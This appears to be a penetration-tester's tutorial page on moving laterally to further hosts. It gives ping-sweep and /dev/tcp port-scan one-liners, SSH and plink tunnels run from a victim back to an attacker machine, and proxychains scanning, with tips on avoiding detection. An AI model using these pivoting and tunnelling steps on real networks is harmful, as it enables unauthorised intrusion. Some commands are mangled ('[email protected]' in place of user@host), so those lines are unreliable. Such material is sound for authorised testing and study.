Skip to content

How to get on the next Box (lateral movement)

To get onto the next box you should recon once again, in this order: 1. look for data in caches/configs 2. use the tools on the machine to avoid early detection 3. use static compiled binaries (ooold static-bin collection, nmap 7.80) 4. use scripts to explore the environment 5. last resort: use tools from your machine through the proxy tunnel (very slow!)

Avoid runing heavy load on the victim. Eg. scan for open ports on the target machine, then grab the banners with a port-list through the proxy tunnel. Note: udp scans via tcp tunnel is not possible!

Identifiy other boxes on the network

Linux

# show arp cache items
arp -a
cat /etc/hosts
cat /etc/resolv.conf
nmcli dev show

Ping sweep one-liner:

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

Simple Portscanner:

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

Windows

arp -a
type C:\Windows\System32\drivers\etc\hosts
ipconfig /all

Warning: pings are usually blocked by windows. Check with a portscanner if they are really down.

Network movement / Proxy with

SSH

There is an excelent visual guide to SSH tunnels.

To kill a background ssh run ps aux | grep ssh and then sudo kill <PID>.

Attacker -> Victim

Local Port Forwarding

  • we can connect to remote ip
  • behind the remote ip is a inner ip with inner port available
  • we bind the local port to the inner ip:inner port via remote ip
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
ssh -L <local port>:<inner ip>:<inner port> [email protected]<remote ip> -fN

Local Proxy Forwarding

  • we can connect to remote ip
  • we bind the local port to socket⅘ proxy via remote ip
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
ssh -D <local port> [email protected]<remote ip> -fN

Victim -> Attacker

Reverse Connections

To get a connection from the victom to the attacker, the victim must * create a pair of ssk keys * transfer the public key from victim to attacker * transfer the private key to the victim * config the authorized_keys on the attakcer box to avoid getting a shell originating from the victim

This setup is pretty complicated and dangerous as you open up your attacker box.

Preparation:

# victim
ssh-keygen
# name of the key: ./reverse
# copy the reverse.pub content

# attacker
echo command=\"echo \'This account can only be used for port forwarding\'\",no-agent-forwarding,no-x11-forwarding,no-pty <public key> >> ~/.ssh/authorized_keys
sudo systemctl status ssh
sudo systemctl start ssh
# generate a throw-away ssh key pair
# copy the private key

# victim
# place the private key somewhere
chmod 600 attacker_id_rsa
ssh <name>@<attacker ip> -i attacker_id_rsa

Remote Port Forwarding

  • we are connected to a remote machine
  • behind the remote ip is a inner ip with inner port available
  • we bind the attacker port to the inner ip:inner port via attacker ip
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
  • -i the private key from the attacker box
ssh -R <attacker port>:<inner ip>:<inner port> [email protected]<attacker ip> -fN -i attacker_id_rsa

Local Proxy Forwarding

  • we are connected to a remote machine
  • we bind the attacker port to socket⅘ proxy via attacker ip
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
  • -i the private key from the attacker box
ssh -R <attacker port> [email protected]<attacker ip> -fN -i attacker_id_rsa

PLink.exe (Windows)

PLink, from the Putty author, is the pendant to SSH on windows. Nowadays windows comes with a ssh server, but legacy systems will need the help of PLink. The syntax is quite the same to SSH for good reason, therefore we will only write the execution examples without that much explaination.

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT [email protected]_IP -i KEYFILE -N
The echo y will confirm the question if you want to connect to the new host and the -N will configure to only port forward.

Since PLink can't read id_rsa files from ssh-keygen, we need to convert it first with puttygen (linux tool).

udo apt install putty-tools
ssh-keygen .....
puttygen inputfile -o outputfile.ppk
Kali already ships with the plink.exe fild under usr/share/windows-resources/binaries/plink.exe and a recent version can be found here.

Proxychains

proxychains is used as a command prefix to tunnel command from the attacker server to the victim server.

Usage: proxychains <command> <args>

The configuration (default here) can set via (in this order): * proxychains -f <file> ... * ./proxychains.conf (pwd) * ${HOME}/.proxychains/proxychains.conf * /etc/proxychains.conf

Cavets

nmap

  • Disable proxy_dns in the config if you want to run scans
  • Only tcp scans are possible (no upd, no syn, no icmp)
    • use -Pn -sS to disable ping and force tcp
  • The scan will be veeeery slow.
    • Check open ports from the victim server
    • Run proxychains nmap -Pn -sS -p <port> --script=<script>

FoxyProxy (http/s proxy)

Can be used to proxy the web traffic through a proxy eg. into a victim network.

Attention: Only proxy selected traffic! You could leak your identity.

Next step

Get on the box